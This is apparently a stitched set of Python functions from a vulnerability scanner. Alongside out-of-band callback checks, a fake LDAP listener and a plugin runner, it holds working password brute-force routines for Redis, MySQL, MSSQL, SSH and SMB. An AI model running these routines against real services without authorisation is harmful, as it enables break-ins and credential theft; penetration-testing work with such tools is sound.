def query_reverse(payload, sleep=True):
    """Query the reverse-connection HTTP server for a payload hit.

    :param payload: search keyword sent to the reverse server
    :param sleep: when True, first wait ``reverse_set["sleep"]`` seconds so
        delayed out-of-band callbacks have time to arrive
    :return: tuple ``(hit: bool, result_data)`` where result_data is the
        server's JSON reply, or ``[]`` when all attempts failed
    """
    if sleep:
        time.sleep(int(reverse_set.get("sleep", 5)))
    url = "http://{}:{}/search".format(
        reverse_set.get("reverse_http_ip"),
        reverse_set.get("reverse_http_port"))
    for _ in range(3):
        try:
            # FIX: pass query/key via ``params`` so the payload is properly
            # URL-encoded (the original string-built URL broke on special
            # characters such as '&' or '#').
            r = requests.get(url,
                             params={"query": payload,
                                     "key": reverse_set.get("secret_key")},
                             timeout=5)
            res = r.json()
            # ``total`` may be missing from the reply; treat that as no hit
            # instead of raising on ``None > 0``.
            if (res.get("total") or 0) > 0:
                return True, res
            else:
                return False, res
        except Exception as ex:
            logger.debug(
                "Get result from reverse http server error:{}".format(ex) +
                "May be your network can't connect to {}".format(
                    reverse_set.get("reverse_http_ip")))
            continue
    return False, []
def ldap_response(client, address):
    # Serve one client of the fake LDAP listener: answer the bindRequest
    # with a canned success so the client sends its search, then extract
    # the queried path, decode it and persist the hit to the DB.
    # ``client`` is an accepted socket, ``address`` its (ip, port) pair.
    try:
        client.settimeout(30)
        buf = client.recv(512)
        # 30 0c 02 01 ... is the start of an LDAP bindRequest message.
        if buf.hex().startswith("300c0201"):
            # Pre-built bindResponse (resultCode success).
            send_data = b"\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00"
            client.send(send_data)
            total = 3  # guard against recv() returning partial data
            # NOTE(review): ``total`` is never decremented, so the loop
            # exits only via the >16 length check or a recv timeout/error
            # — confirm this is intentional.
            buf1 = b""
            while total:
                buf1 += client.recv(512)
                if len(buf1) > 16:
                    break
            if buf1:
                path = getldappath(buf1).decode(errors="ignore")
                logger.debug("client:{} send path:{}".format(address, path))
                res = {}
                res["type"] = "ldap"
                res["client"] = address[0]
                res["query"] = path
                res["info"] = decode(path)
                res["time"] = time.strftime('%Y-%m-%d %H:%M:%S',
                                            time.localtime(time.time()))
                logger.info("Insert to db:" + str(res))
                insert_db(res)
    except Exception as ex:
        logger.warning('Run ldap error:{} address:{}'.format(ex, address))
    finally:
        # Always release the client socket, even on protocol errors.
        client.close()
def run_python_plugin():
    """Worker loop: pop pickled plugin jobs off redis and execute each one
    under a SIGALRM-based timeout until interrupted."""
    red = getredis()
    try:
        while True:
            try:
                raw = red.lpop("plugin_data_py")
                if not raw:
                    # Queue empty — back off briefly before polling again.
                    time.sleep(random.uniform(1, 2))
                    continue
                job = pickle.loads(raw)
                # Kill a plugin that overruns the configured timeout.
                signal.signal(signal.SIGALRM, handler_plugin)
                signal.alarm(int(scan_set.get("poc_timeout")))
                # job layout: {"id": id, "poc": poc}
                logger.debug("Python plugin get one data")
                python_plugin(job).run()
                signal.alarm(0)
            except Exception as ex:
                traceback.print_exc()
                logger.warning("Run_python scan get error:{}".format(ex))
    except KeyboardInterrupt as ex:
        logger.warning("Ctrl+C was pressed ,aborted program")
    except Exception as ex:
        traceback.print_exc()
        logger.warning("Run_python main scan get error:{}".format(ex))
def crack_redis(self, pwd):
    """Try one password against the target redis instance.

    ``pwd`` of None means "try unauthenticated access" via INFO.
    On success the password is recorded in ``self.right_pwd``; a
    protected-mode reply sets ``self.is_protected`` so later attempts
    are skipped.
    """
    if self.right_pwd is None and self.is_protected is False:
        logger.debug("test redis_brute pwd:{}".format(pwd))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.settimeout(5)
            s.connect((self.addr, self.port))
            if pwd is None:
                # No auth configured: an open instance answers INFO.
                s.send("INFO\r\n".encode())
                result = s.recv(1024)
                if b"redis_version" in result:
                    self.right_pwd = str(pwd)
            else:
                s.send(("AUTH %s\r\n" % (pwd)).encode())
                result = s.recv(1024)
                if b'+OK' in result:
                    self.right_pwd = pwd
                if b"running in protected" in result:
                    # BUG FIX: original had ``Truee`` — a NameError that
                    # aborted the attempt instead of marking the target.
                    self.is_protected = True
        except Exception as ex:
            pass
        finally:
            s.close()
def run(self):
    """Extract domain names from the request/response bodies and bulk-index
    the unique ones into the ``burpdns`` elasticsearch index."""
    # base64-decode both bodies so domains can be searched as plain text.
    decoded_texts = [
        base64.b64decode(self.dictdata.get(part).get("raw")).decode(
            "utf-8", errors="ignore")
        for part in ("request", "response")
    ]
    unique_domains = set()
    for text in decoded_texts:
        unique_domains.update(self.getdomain(text))
    actions = []
    for domain in unique_domains:
        try:
            actions.append({
                "_index": "burpdns",
                "_type": "doc",
                "_id": self.get16md5(domain),
                "_source": {
                    "domain": domain,
                    "topdomain": self.gettopdomain(domain),
                    "ts": int(time.time()),
                },
            })
        except Exception as ex:
            print("Process domain error:{}".format(ex))
    if actions:
        helpers.bulk(self.es, actions)
        logger.debug("extractdoman insert {} lines".format(len(actions)))
def crack_mysql(self, userpwd):
    """Try one (user, password) pair against the target MySQL server.

    Records a hit in ``self.right_pwd``; clears ``self.allow_connect``
    when the server's host ACL rejects this client entirely.
    """
    user, pass_ = userpwd
    if self.right_pwd is None and self.allow_connect:
        logger.debug("test mysql_brute userpwd:{}".format(userpwd))
        try:
            # FIX: use keyword arguments — the positional
            # (host, user, passwd) form was removed in pymysql >= 1.0.
            conn = pymysql.connect(host=self.addr, user=user,
                                   password=pass_, port=self.port)
            # FIX: close the connection we only needed for authentication.
            conn.close()
            self.right_pwd = userpwd
        except Exception as e:
            if "not allowed to connect to" in str(e):
                # Host-based ACL blocks us — further attempts are futile.
                self.allow_connect = False
def run(self):
    """Run every enabled plugin script against a deep copy of the shared
    scan data, logging (not raising) per-plugin failures."""
    for plugin_path in cmd_line_options.open_lugins:
        try:
            module = load_file_to_module(plugin_path)
            instance = module.plugin(copy.deepcopy(self.dictdata))
            logger.debug("Start plugin script:{}".format(plugin_path))
            instance.run()
        except Exception as ex:
            logger.warning("run plugin script:{} error:{}".format(
                plugin_path, ex))
def verify(self): dictdata = self.dictdata # 把请求体和响应体 base64解码,便于搜索 request_raw = base64.b64decode(self.dictdata.get("request").get("raw").encode("utf8")) response_raw = base64.b64decode(self.dictdata.get("response").get("raw").encode("utf8")) dictdata["request"]["raw"] = request_raw.decode("utf-8", errors="ignore") dictdata["response"]["raw"] = response_raw.decode("utf-8", errors="ignore") dictdata["request"]["headers"] = str(dictdata["request"]["headers"]) dictdata["response"]["headers"] = str(dictdata["response"]["headers"]) if "others" in dictdata.keys(): del dictdata["others"] if "filter" in dictdata.keys(): del dictdata["filter"] dictdata["source"] = "burp" dictdata["url"]["ip"] = self.getaddr(dictdata.get("url").get("host")) dictdata["url"]["pathroot"] = "{protocol}://{host}:{port}/".format(**dictdata.get("url")) if dictdata["url"]["extension"] == "ico": body = response_raw[int(dictdata.get("response").get("bodyoffset")):] dictdata["url"]["icon_hash"] = str(mmh3.hash(base64.b64encode(body))) actions = [] action = { "_index": "httpinfo", "_id": self.http_md5(dictdata), "_source": dictdata } actions.append(action) # get url from html urls_from_html = self.get_html_url(dictdata["url"]["url"], response_raw[int(dictdata.get("response").get("bodyoffset")):].decode( "utf-8", "ignore"), dictdata["response"]["mime_inferred"]) logger.debug("urls_from_html total:{}".format(len(urls_from_html))) if urls_from_html: mythread(self.getaddr, self.hosts, 50) for url_data in urls_from_html: url_data["ip"] = self.dict_host_ip[url_data["host"]] action_ = { "_index": "httpinfo", "_id": getmd5("{ip}{pathroot}{path}".format(**url_data)), "_source": {"url": url_data, "source": "html", "ts": dictdata["ts"]} } actions.append(action_) try: helpers.bulk(others.es_conn, actions) logger.debug("es insert {} lines".format(len(actions))) except Exception as ex: logger.warning("Plugin {} get error:{}".format(__name__, ex)) traceback.print_exc()
def find_dnsservers(self):
    """Validate the candidate DNS servers from data/common/dns_servers.txt.

    Blank lines and ``#`` comments are skipped; the survivors are probed
    concurrently by :meth:`test_server`, which appends working servers to
    ``self.dns_servers``.

    :return: the list of validated DNS server IPs (``self.dns_servers``)
    """
    logger.debug('[+] Validate DNS servers')
    dns_ips = []
    path = os.path.join(paths.MYSCAN_DATA_PATH, "common", "dns_servers.txt")
    # FIX: use a context manager — the original open() leaked the handle.
    with open(path) as f:
        for server in f:
            server = server.strip()
            if server and not server.startswith('#'):
                dns_ips.append(server)
    mythread(self.test_server, dns_ips, 5)
    return self.dns_servers
def run(self):
    """Run every enabled language-plugin script against a deep copy of
    the shared data; failures are logged with a traceback, never raised."""
    for plugin_path in cmd_line_options.open_lugins:
        try:
            module = load_file_to_module(plugin_path)
            instance = module.plugin(copy.deepcopy(self.dictdata))
            logger.debug("Start languages script:{}".format(plugin_path))
            instance.run()
            logger.debug("Done languages script:{}".format(plugin_path))
        except Exception as ex:
            traceback.print_exc()
            logger.warning("run languages script:{} error:{}".format(
                plugin_path, ex))
def request(**kwargs_sour):
    """Project-wide wrapper around ``requests.request``.

    Applies defaults (verify=False, timeout=8, UA header), honors the
    global proxy/timeout options, retries ``cmd_line_options.retry`` extra
    times, keeps request counters in redis, and feeds successful responses
    to the search module when enabled.

    :param kwargs_sour: keyword arguments for ``requests.request``
        (must include ``url`` and ``method``); deep-copied, never mutated.
    :return: the ``requests.Response`` or None when every attempt failed
    """
    kwargs = copy.deepcopy(kwargs_sour)
    red = getredis()
    if not kwargs.get("verify", None):
        kwargs["verify"] = False
    if not kwargs.get("timeout", None):
        kwargs["timeout"] = 8
    if not kwargs.get("headers", None):
        kwargs["headers"] = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0"
        }
    # Global CLI options override per-call settings.
    if cmd_line_options.proxy:
        kwargs["proxies"] = cmd_line_options.proxy
    if cmd_line_options.timeout:
        kwargs["timeout"] = cmd_line_options.timeout
    if kwargs.get('data', None):
        if isinstance(kwargs.get("data"), str):
            kwargs["data"] = kwargs["data"].encode("utf-8", "ignore")
    r = None
    red.hincrby("count_all", "request", amount=1)
    h, p = gethostportfromurl(kwargs.get("url"))
    block = block_info(h, p)
    # Retry loop: first attempt + cmd_line_options.retry extras.
    for x in range(cmd_line_options.retry + 1):
        try:
            r = requests.request(**kwargs)
            block.push_result_status(0)
            break
        except requests.exceptions.ConnectTimeout:
            # NOTE(review): timeouts neither push a block status nor back
            # off before retrying — confirm this asymmetry is intended.
            pass
        except requests.exceptions.ReadTimeout:
            pass
        except Exception as ex:
            logger.debug("Request error url:{} error:{}".format(
                kwargs["url"], ex))
            block.push_result_status(1)
            sleep(uniform(0, 0.2))
    # FIX: idiomatic identity test (was ``r != None``).
    if r is not None:
        if scan_set.get("search_open", False):
            s = searchmsg(r)
            s.verify()
            s.saveresult()
    else:
        red.hincrby("count_all", "request_fail", amount=1)
    return r
def run(self): dictdata = json.loads(self.red.hget(self.workdata.get("id"), "data")) # count==0 则删除,防止内存过大 current_count = self.red.hincrby(self.workdata.get("id"), "count", amount=-1) if current_count == 0: logger.debug("Will delete data for id:{}".format(self.workdata.get("id"))) self.red.delete(self.workdata.get("id")) self.workdata["dictdata"] = copy.deepcopy(dictdata) self.poc = self.workdata.get("poc") func_data = cmd_line_options.pocs_load_moudle[self.workdata.get('type')].get(hash(self.poc), None) if func_data is None: logger.debug("{} poc not found,will kill this task".format(self.poc)) return func = copy.deepcopy(func_data.get("class").POC) class_poc = func(self.workdata) logger.debug("Start python script:{} at {}".format(self.poc, self.workdata.get("data", "None"))) self.red.hincrby("count_all", "active", amount=1) try: class_poc.verify() # process = psutil.Process(os.getpid()) # os.getpid() # memInfo = process.memory_info() # print('pid: {}'.format(os.getpid()), int(memInfo.rss / 1024 / 1014), 'mb on {}'.format(os.path.basename(self.poc))) if class_poc.result: self.result = class_poc.result self.saveResult() # logger.critical(poc.result) logger.debug("Done python script:{} at {}".format(self.poc, self.workdata.get("data", "None"))) except Exception as ex: traceback.print_exc() finally: self.red.hincrby("count_all", "active", amount=-1)
def output(self, msg, insert=False):
    """Per-site output rate limiter backed by a redis set.

    With ``insert=False`` (query mode) returns True when ``msg`` — keyed
    by site root + message — may still be reported, False once its marker
    exists. With ``insert=True`` records the marker and returns None.
    """
    site_root = "/".join(self.dictdata.get("url").get("url").split("/")[:3])
    msg = site_root + " " + msg
    msgmd5 = getmd5(msg)[10:18]
    red = getredis()
    if insert == False:
        if red.sismember("myscan_max_output", msgmd5):
            logger.debug("sql boolen moudle : {} 输出个数已达{}上限,不再测试输出".format(
                msg, self.verify_count))
            return False  # already reported — stop testing/printing
        return True  # not seen yet — OK to report
    else:
        red.sadd("myscan_max_output", msgmd5)
def crack_mssql(self, userpwd):
    # Try one (user, password) pair against the target MSSQL server by
    # hand-building a TDS 4.2-style login packet: the template below has
    # placeholder runs (X/Y = hex lengths of user/password, ZZ = length of
    # "addr:port") that are patched in before sending. A reply containing
    # b'master' means the login succeeded.
    user, pass_ = userpwd
    if self.right_pwd is None:
        logger.debug("test mssql_brute userpwd:{}".format(userpwd))
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.settimeout(8)
            sock.connect((self.addr, self.port))
            # hex-encode the fields that get spliced into the template
            hh = binascii.b2a_hex(self.addr.encode()).decode()
            husername = binascii.b2a_hex(user.encode()).decode()
            lusername = len(user)
            lpassword = len(pass_)
            ladd = len(self.addr) + len(str(self.port)) + 1
            hpwd = binascii.b2a_hex(pass_.encode()).decode()
            pp = binascii.b2a_hex(str(self.port).encode()).decode()
            address = hh + '3a' + pp  # "<addr>:<port>" in hex ('3a' = ':')
            # hhost = binascii.b2a_hex(ip.encode()).decode()
            data = "0200020000000000123456789000000000000000000000000000000000000000000000000000ZZ5440000000000000000000000000000000000000000000000000000000000X3360000000000000000000000000000000000000000000000000000000000Y373933340000000000000000000000000000000000000000000000000000040301060a09010000000002000000000070796d7373716c000000000000000000000000000000000000000000000007123456789000000000000000000000000000000000000000000000000000ZZ3360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000Y0402000044422d4c6962726172790a00000000000d1175735f656e676c69736800000000000000000000000000000201004c000000000000000000000a000000000000000000000000000069736f5f31000000000000000000000000000000000000000000000000000501353132000000030000000000000000"
            # splice address / username / password over fixed offsets
            data1 = data.replace(data[16:16 + len(address)], address)
            data2 = data1.replace(data1[78:78 + len(husername)], husername)
            data3 = data2.replace(data2[140:140 + len(hpwd)], hpwd)
            # patch the length placeholders: lengths >= 16 fill two hex
            # digits ('0X'/'0Y'), shorter ones only the single X/Y slot.
            if lusername >= 16:
                data4 = data3.replace(
                    '0X', str(hex(lusername)).replace('0x', ''))
            else:
                data4 = data3.replace(
                    'X', str(hex(lusername)).replace('0x', ''))
            if lpassword >= 16:
                data5 = data4.replace(
                    '0Y', str(hex(lpassword)).replace('0x', ''))
            else:
                data5 = data4.replace(
                    'Y', str(hex(lpassword)).replace('0x', ''))
            hladd = hex(ladd).replace('0x', '')
            data6 = data5.replace('ZZ', str(hladd))
            data7 = binascii.unhexlify(data6)
            sock.send(data7)
            packet = sock.recv(1024)
            # successful logins get a reply mentioning the 'master' DB
            if b'master' in packet:
                self.right_pwd = userpwd
        except Exception as e:
            pass
        finally:
            sock.close()
def can_output(self, msg, insert=False):
    """Once-only output gate backed by a redis set.

    ``msg`` should be url+somename. Query mode (``insert=False``) returns
    True while the marker is absent, False afterwards; ``insert=True``
    records the marker and returns None.
    """
    msgmd5 = getmd5(msg)
    red = getredis()
    if insert == False:
        if red.sismember("myscan_max_output", msgmd5):
            logger.debug("{} 输出个数已达一次,不再测试输出".format(msg))
            return False  # already emitted once
        return True  # first sighting — OK to emit
    else:
        red.sadd("myscan_max_output", msgmd5)
def crack_ssh(self, userpwd):
    """Try one (user, password) pair over SSH.

    Records a hit in ``self.right_pwd``.

    :return: "success" on login, otherwise the stringified exception
    """
    user, pass_ = userpwd
    if self.right_pwd is None:
        logger.debug("test ssh_brute userpwd:{}".format(userpwd))
        ssh = paramiko.SSHClient()
        try:
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            ssh.connect(hostname=self.addr,
                        port=self.port,
                        username=user,
                        password=pass_,
                        banner_timeout=300)
            self.right_pwd = userpwd
            return "success"
        except Exception as e:
            print("fail")
            return str(e)
        finally:
            # FIX: always close the client — the original leaked the
            # transport socket on every attempt.
            ssh.close()
def check_url(self, path, verify=True):
    """Probe ``path`` under the scan root and decide whether it is a real
    finding rather than a soft-404.

    :param path: path (optionally with query string) to request
    :param verify: when True, run the anti-false-positive checks; when
        False just return the response body
    :return: ``(status_code, content_length)`` for a verified hit, the raw
        body when ``verify`` is False, or False otherwise
    """
    if not path.startswith("/"):
        path = "/" + path
    # url = self.rootpath + path
    url = self.url[:-1] + path
    req = self.parser.generaterequest({"url": url, "method": "GET"})
    r = request(**req)
    if r is not None:
        if verify:
            if r.status_code == 200:
                # Similarity check against the known error page.
                if self.error_content is not None:
                    if similar(self.error_content, r.content) > self.similar_rate:
                        return False
                # FIX: initialize args — the original left it undefined
                # for paths without a query string (NameError below).
                args = ""
                if "?" in path:
                    path, args = path.split("?", 1)
                    args = "?" + args
                ext = ""
                if not path.endswith("/"):
                    # Build a sibling path with a randomized filename.
                    dirname = os.path.dirname(path)
                    a, b = os.path.splitext(os.path.basename(path))
                    a = a + get_random_str(4)
                    ext = b
                    path_error = "".join([dirname, a, b]) + args
                else:
                    path_error = path[:-1] + get_random_str(4) + path[-1]
                # Backup-style extensions must not come back as HTML.
                if ext in self.exts_bak:
                    # FIX: default to "" — a missing Content-Type header
                    # made ``in None`` raise TypeError.
                    if "/html" in r.headers.get("Content-Type", ""):
                        return False
                # Compare against the randomized path's response.
                url_ = self.url[:-1] + path_error
                logger.debug("test new url:{}".format(url_))
                req_ = self.parser.generaterequest({"url": url_, "method": "GET"})
                r_ = request(**req_)
                if r_ is not None and similar(r_.content, r.content) < self.similar_rate:
                    # Final gate: Content-Type/size versus historic hits.
                    if self.similar_others(r):
                        return (r.status_code, len(r.content))
        else:
            return r.content
    return False
def run(self):
    """Extract domains from the request/response bodies and append the
    previously-unseen ones (dated, with their top domain) to the output
    file."""
    # base64-decode both bodies so domains can be matched as plain text.
    texts = [
        base64.b64decode(self.dictdata.get(part).get("raw")).decode(
            "utf-8", errors="ignore")
        for part in ("request", "response")
    ]
    found = set()
    for text in texts:
        found.update(self.getdomain(text))
    rows = [
        [time.strftime("%Y-%m-%d", time.localtime()),
         domain,
         self.gettopdomain(domain)]
        for domain in found
        if not self.existfromredis(domain)
    ]
    self.outtofile(rows)
    logger.debug("extractdoman insert {} lines".format(len(rows)))
def crack_smb(self, userpwd):
    """Try one (user, password) pair against the target SMB service.

    Records a hit in ``self.right_pwd``.
    """
    user, pwd = userpwd
    if self.right_pwd is None:
        logger.debug("test smb_brute userpwd:{}".format(userpwd))
        conn = SMBConnection(user,
                             pwd,
                             "client",
                             self.addr,
                             use_ntlm_v2=True,
                             is_direct_tcp=True)
        try:
            # FIX: the second argument of connect() is the port — the
            # original passed ``self.addr`` twice, so the TCP connection
            # could never be established.
            smb_authentication_successful = conn.connect(
                self.addr, self.port, timeout=6)
            if smb_authentication_successful:
                self.right_pwd = userpwd
        except Exception as e:
            pass
        finally:
            # Single close in finally (the original also closed inside the
            # try, double-closing on success).
            conn.close()
def run(self): dictdata = json.loads(self.red.hget(self.workdata.get("id"), "data")) # count==0 则删除,防止内存过大 current_count = self.red.hincrby(self.workdata.get("id"), "count", amount=-1) if current_count == 0: logger.debug("Will delete data for id:{}".format(self.workdata.get("id"))) self.red.delete(self.workdata.get("id")) # self.workdata["dictdata"] = copy.deepcopy(dictdata) self.poc = self.workdata.get("poc") func_data = cmd_line_options.allow_plugin[self.workdata.get('pochash')].get("class", None) if func_data is None: logger.warning("{} poc not found,will kill this task".format(self.poc)) return func = func_data.POC class_poc = func(dictdata) logger.debug("Start python plugin script:{} ".format(self.poc)) try: class_poc.verify() # process = psutil.Process(os.getpid()) # os.getpid() # memInfo = process.memory_info() # print('pid: {}'.format(os.getpid()), int(memInfo.rss / 1024 / 1014), 'mb on {}'.format(os.path.basename(self.poc))) logger.debug("Done python plugin script:{} ".format(self.poc)) except Exception as ex: traceback.print_exc()
def run_python_poc():
    """Worker loop: pop pickled poc jobs off redis and run each one under
    a SIGALRM-based timeout until interrupted."""
    red = getredis()
    try:
        while True:
            try:
                # random_test pulls from a set (random order); otherwise
                # jobs come off the list FIFO.
                if scan_set.get("random_test", False):
                    workdata = red.spop("work_data_py_set")
                else:
                    # red.lpush("work_data_py", pickledata)
                    workdata = red.lpop("work_data_py")
                if workdata:
                    workdata_ = pickle.loads(workdata)
                    # Abort a poc that runs past the configured timeout.
                    signal.signal(signal.SIGALRM, handler)
                    signal.alarm(int(scan_set.get("poc_timeout")))
                    # workdata_ will like this
                    # {
                    #     "id": id,
                    #     "data": None,   # None for perscheme jobs
                    #     "poc": poc,
                    #     "type": "perscheme"
                    # }
                    logger.debug("Python poc get one data, type:" +
                                 workdata_.get("type"))
                    p = python_poc(workdata_)
                    p.run()
                    signal.alarm(0)
                else:
                    # Queue empty — back off briefly before polling again.
                    time.sleep(random.uniform(1, 2))
            except Exception as ex:
                traceback.print_exc()
                logger.warning("Run_python scan get error:{}".format(ex))
                pass
    except KeyboardInterrupt as ex:
        logger.warning("Ctrl+C was pressed ,aborted program")
    except Exception as ex:
        traceback.print_exc()
        logger.warning("Run_python main scan get error:{}".format(ex))
def run_python():
    """Worker loop: pop pickled poc jobs off the ``work_data_py`` redis
    list and run them until interrupted."""
    red = getredis()
    try:
        while True:
            try:
                raw = red.lpop("work_data_py")
                if not raw:
                    # Queue empty — back off briefly before polling again.
                    time.sleep(random.uniform(1, 2))
                    continue
                job = pickle.loads(raw)
                logger.debug("Python poc get one data, type:" +
                             job.get("type"))
                python_poc(job).run()
            except Exception as ex:
                traceback.print_exc()
                logger.warning("Run_python process get error:{}".format(ex))
    except KeyboardInterrupt as ex:
        logger.warning("Ctrl+C was pressed ,aborted program")
    except Exception as ex:
        traceback.print_exc()
        logger.warning("Run_python main process get error:{}".format(ex))
def check_url(self, path, verify=True):
    # Probe ``path`` and decide whether it is a real finding rather than a
    # soft-404. Returns (status_code, content_length) for a verified hit,
    # the raw body when verify is False, or False otherwise.
    if not path.startswith("/"):
        path = "/" + path
    # url = self.rootpath + path
    url = self.url[:-1] + path
    req = self.parser.generaterequest({"url": url, "method": "GET"})
    r = request(**req)
    if r is not None:
        if verify:
            if r.status_code == 200:
                # Similarity check against the known error page.
                if self.error_content is not None:
                    if similar(self.error_content, r.content) > self.similar_rate:
                        return False
                # Compare against a randomized sibling path: a soft-404
                # responds near-identically for both.
                if not path.endswith("/"):
                    dirname = os.path.dirname(path)
                    a, b = os.path.splitext(os.path.basename(path))
                    a = a + get_random_str(4)
                    path_error = "".join([dirname, a, b])
                else:
                    path_error = path[:-1] + get_random_str(4) + path[-1]
                url_ = self.rootpath + path_error
                logger.debug("test new url:{}".format(url_))
                req_ = self.parser.generaterequest({
                    "url": url_,
                    "method": "GET"
                })
                r_ = request(**req_)
                if r_ is not None and similar(
                        r_.content, r.content) < self.similar_rate:
                    return (r.status_code, len(r.content))
                # could also compare .rar/.7z paths via the filetype lib,
                # but that costs too much memory — skipped
        else:
            return r.content
    return False
def run(self):
    """Run every pre-loaded poc module matching this work item's type
    against a deep copy of the work data, saving any results.

    (Dead commented-out code from the previous load-per-run implementation
    has been removed.)
    """
    for poc_info in cmd_line_options.pocs_load_moudle[self.workdata.get("type")]:
        self.poc = poc_info.get("poc")
        func = poc_info.get("class")
        # Each poc gets its own deep copy so it cannot mutate shared data.
        class_poc = func.POC(copy.deepcopy(self.workdata))
        logger.debug("Start python script:{}".format(self.poc))
        class_poc.verify()
        if class_poc.result:
            self.result = copy.deepcopy(class_poc.result)
            self.saveResult()
        logger.debug("Done python script:{}".format(self.poc))
def test_server(self, server):
    """Validate a single candidate DNS server: it must resolve a known
    domain to the expected address AND refuse to invent answers for a
    non-existent one (no wildcard hijacking). Working servers are appended
    to ``self.dns_servers``."""
    resolver = dns.resolver.Resolver(configure=False)
    resolver.lifetime = resolver.timeout = 5.0
    padded = server.ljust(16)
    try:
        resolver.nameservers = [server]
        # known-good domain with a fixed A record
        reply = resolver.query('public-dns-a.baidu.com')
        if reply[0].address != '180.76.76.76':
            raise Exception('Incorrect DNS response')
        try:
            # a domain that must NOT resolve — an answer means hijacking
            resolver.query('test.bad.dns.lijiejie.com')
            logger.debug('[+] Bad DNS Server found %s' % server)
        except Exception as e:
            self.dns_servers.append(server)
            logger.debug('[+] Server %s < OK > Found %s' %
                         (padded, len(self.dns_servers)))
    except Exception as e:
        logger.debug('[+] Server %s <Fail> Found %s' %
                     (padded, len(self.dns_servers)))
def init_options():
    """Parse CLI options into the global ``cmd_line_options``, configure
    logging/proxy, then discover and load the enabled pocs and plugins."""
    cmd_line_options.update(cmd_line_parser().__dict__)
    # version banner then exit
    if cmd_line_options.show_version:
        print(banner())
        sys.exit()
    print(banner())
    # --check-reverse: test the reverse-connection server then exit
    if cmd_line_options.check_reverse:
        check_reverse()
        sys.exit()
    # TODO: needs validation / error handling / socks proxy support
    if cmd_line_options.proxy:
        host_port = cmd_line_options.proxy
        cmd_line_options.proxy = {
            "http": "http://" + host_port,
            "https": "https://" + host_port,
        }
    else:
        cmd_line_options.proxy = {}
    # verbosity 0..3 maps to DEBUG..CRITICAL
    if cmd_line_options.verbose == 0:
        logger.logger.setLevel(logging.DEBUG)
    elif cmd_line_options.verbose == 1:
        logger.logger.setLevel(logging.INFO)
    elif cmd_line_options.verbose == 2:
        logger.logger.setLevel(logging.WARNING)
    elif cmd_line_options.verbose == 3:
        logger.logger.setLevel(logging.CRITICAL)
    # html-output handling (the old create-file-or-abort logic was
    # commented out here and has been dropped for clarity)
    if cmd_line_options.command == "webscan":
        logger.info("Vuln results will output to: {}".format(
            cmd_line_options.html_output))
    cmd_line_options.allow_poc = []
    cmd_line_options.pocs_perfile = []
    cmd_line_options.pocs_perfoler = []
    cmd_line_options.pocs_perscheme = []
    cmd_line_options.pocs_load_moudle = {
        "perfile": [],
        "perfolder": [],
        "perscheme": []
    }
    # NOTE(review): debug print left in production code — confirm removal.
    print(cmd_line_options.disable)
    if "all" not in cmd_line_options.disable:
        # poc_keys aliases the per-category lists filled below
        poc_keys = {
            "perfile": cmd_line_options.pocs_perfile,
            "perfolder": cmd_line_options.pocs_perfoler,
            "perscheme": cmd_line_options.pocs_perscheme
        }
        # --disable wins over --enable: keep every poc NOT matched by a
        # disable substring
        if cmd_line_options.disable:
            cmd_line_options.enable = None
            for _dir in ["perfile", "perfolder", "perscheme"]:
                path_dir = os.path.join(paths.MYSCAN_POCS_PATH, _dir)
                exists_poc_with_ext = list(
                    filter(lambda x: not x.startswith("__"),
                           os.listdir(path_dir)))
                temp = copy.deepcopy(exists_poc_with_ext)
                for disable in cmd_line_options.disable:
                    for poc in exists_poc_with_ext:
                        if disable in poc and poc in temp:
                            temp.remove(poc)
                for x in temp:
                    poc_keys.get(_dir).append(os.path.join(path_dir, x))
        # --enable: keep pocs matched by an enable substring ("*" = all)
        if cmd_line_options.enable:
            for _dir in ["perfile", "perfolder", "perscheme"]:
                path_dir = os.path.join(paths.MYSCAN_POCS_PATH, _dir)
                exists_poc_with_ext = list(
                    filter(
                        lambda x: (not x.startswith("__") and
                                   (x.endswith(".py") or x.endswith(".yaml"))),
                        os.listdir(path_dir)))
                if "*" == cmd_line_options.enable:
                    for poc in exists_poc_with_ext:
                        poc_keys.get(_dir).append(
                            os.path.join(path_dir, poc))
                else:
                    for disable in cmd_line_options.enable:
                        for poc in exists_poc_with_ext:
                            if disable in poc:
                                poc_keys.get(_dir).append(
                                    os.path.join(path_dir, poc))
        # import every selected poc file as a module
        for _dir in ["perfile", "perfolder", "perscheme"]:
            logger.debug("{} total: {} pocs".format(
                _dir.capitalize(), len(poc_keys.get(_dir))))
            for poc in poc_keys.get(_dir):
                logger.info("Load Pocs:{}".format(poc))
                cmd_line_options.pocs_load_moudle[_dir].append({
                    "poc": poc,
                    "class": load_file_to_module(poc)
                })
        if not (cmd_line_options.pocs_perfile or
                cmd_line_options.pocs_perfoler or
                cmd_line_options.pocs_perscheme):
            logger.warning(
                "No Pocs ,please use --enable * or like --enable un_auth sqli"
            )
            sys.exit()
    # plugin option handling: enable plugins whose filename matches a
    # requested substring
    cmd_line_options.open_lugins = []
    plugins_dir = paths.MYSCAN_PLUGINS_PATH
    exists_poc_with_ext = list(
        filter(lambda x: not x.startswith("__"), os.listdir(plugins_dir)))
    if cmd_line_options.plugins:
        for openplugin in list(set(cmd_line_options.plugins)):
            for plugin in exists_poc_with_ext:
                if openplugin in plugin:
                    logger.info("Load Plugin:{}".format(
                        os.path.join(plugins_dir, plugin)))
                    cmd_line_options.open_lugins.append(
                        os.path.join(plugins_dir, plugin))
def init_options():
    """Parse CLI options into the global ``cmd_line_options``, configure
    logging/proxy/DNS, discover and load pocs (webscan or hostscan) and
    plugins, then apply runtime patches and connections."""
    # apply the urlencode monkey-patch before anything builds requests
    pathch_urlencode()
    cmd_line_options.update(cmd_line_parser().__dict__)
    # version banner then exit
    if cmd_line_options.show_version:
        print(banner())
        sys.exit()
    print(banner())
    # --check-reverse: test the reverse-connection server then exit
    if cmd_line_options.check_reverse:
        check_reverse()
        sys.exit()
    # reverse mode needs none of the scan setup below
    if cmd_line_options.command == "reverse":
        return
